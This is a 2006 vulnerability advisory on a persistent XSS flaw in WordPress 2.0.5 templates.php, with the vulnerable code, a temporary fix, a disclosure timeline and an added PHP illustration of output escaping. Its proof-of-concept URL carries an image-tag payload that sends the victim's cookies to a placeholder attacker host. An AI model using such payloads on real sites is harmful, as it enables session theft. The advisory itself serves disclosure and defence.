
wp205-xss.txt

Posted on 28 December 2006

Vulnerability Title: WordPress Persistent XSS
Author: David Kierznowski
Homepage: http://michaeldaw.org
Software Vendor: WordPress
Vulnerability: Persistent XSS
Versions affected: Confirmed in v2.0.5 (latest)

WordPress is a popular open source blogging software. A persistent XSS vulnerability has been found in WordPress (to be honest I have found a few problems and hope to publish these soon). This issue affects the latest version, v2.0.5.

Discussion:

When editing files, a shortcut list titled "recently accessed files" is created. The anchor's href value is correctly escaped with wp_specialchars(); however, the link text is not sanitised. Instead, it is taken straight from get_file_description($file). The only restriction here is that our text is passed through basename(), so a standard <script>...</script> payload fails because the closing tag contains a /. This can be worked around with unclosed IMG tags, which works under Firefox and IE.

Vulnerable code (wp-admin/templates.php):

[line 22]  $recents = get_option('recently_edited');
[line 72]  update_recently_edited($file);
[line 116] foreach ($recents as $recent) :
               echo "<li><a href='templates.php?file=" . wp_specialchars($recent, true) . "'>" . get_file_description(basename($recent)) . "</a></li>";

Vulnerable function:

function get_file_description($file) {
    global $wp_file_descriptions;
    if (isset ($wp_file_descriptions[basename($file)])) {
        return $wp_file_descriptions[basename($file)];
    } elseif (file_exists(ABSPATH.$file)) {
        $template_data = implode('', file(ABSPATH.$file));
        if (preg_match("|Template Name:(.*)|i", $template_data, $name))
            return $name[1];
    }
    return basename($file);
}

Proof of concept:

https://blogsite/wp/wp-admin/templates.php?file=<img src="" onerror=javascript:document.location.href='http://evilhacker/capturecookie.php?'+document.cookie;>

Temp Fix:

Comment out the following line in wp-admin/templates.php:
[Line 72] update_recently_edited($file);

WordPress was contacted: 26/12/06 22:04 BST
Reply received: 27/12/06 06:11 BST

WordPress has fixed this for v2.0.6 and a patch has been released for v2.0.5, see http://trac.wordpress.org/changeset/4665
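As an added illustration that is not part of the original advisory or of WordPress's code, the following stand-alone PHP models the recently-edited list renderer: the same lookup order as get_file_description(), the vulnerable output with only the href escaped, and an output-escaped form beside it. The escaping shown is this example's own fix, not necessarily what changeset 4665 does, and $wp_file_descriptions is a constructed stand-in for the WordPress global (file reads are omitted so it runs without a WordPress tree).

```php
<?php
// Constructed stand-in for WordPress's global $wp_file_descriptions map.
$wp_file_descriptions = ['index.php' => 'Main Index Template'];

// Model of get_file_description(): known description, else basename().
// The "Template Name:" file-header branch is left out so this runs offline.
function get_file_description_model(string $file, array $descriptions): string {
    $base = basename($file);
    if (isset($descriptions[$base])) {
        return $descriptions[$base];
    }
    return $base; // attacker-controlled when $file originated from ?file=
}

// Vulnerable rendering (as in templates.php line 116): the href value is
// escaped, but the link text from get_file_description() is emitted raw.
function render_recent_vulnerable(string $recent, array $descriptions): string {
    return "<li><a href='templates.php?file=" . htmlspecialchars($recent, ENT_QUOTES)
        . "'>" . get_file_description_model($recent, $descriptions) . "</a></li>";
}

// Hardened rendering: every untrusted value is escaped at the point of
// output, so tag characters in the file name become inert text.
function render_recent_fixed(string $recent, array $descriptions): string {
    return "<li><a href='templates.php?file=" . htmlspecialchars($recent, ENT_QUOTES)
        . "'>" . htmlspecialchars(get_file_description_model($recent, $descriptions), ENT_QUOTES)
        . "</a></li>";
}

// Constructed inputs: a legitimate theme file, a closed tag (which basename()
// truncates at the '/' in '</b>', as the advisory notes), and an unclosed tag
// that survives basename() intact.
$inputs = [
    'wp-content/themes/default/index.php',
    '<b>closed</b>',
    '<img src=x onerror=alert(1)>',
];
foreach ($inputs as $in) {
    echo "input:      $in\n";
    echo "vulnerable: " . render_recent_vulnerable($in, $wp_file_descriptions) . "\n";
    echo "fixed:      " . render_recent_fixed($in, $wp_file_descriptions) . "\n\n";
}
```

Running it shows the closed-tag input reduced to "b>" by basename(), while the unclosed tag passes through the vulnerable renderer verbatim and comes out of the fixed renderer as &lt;img ... &gt;.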
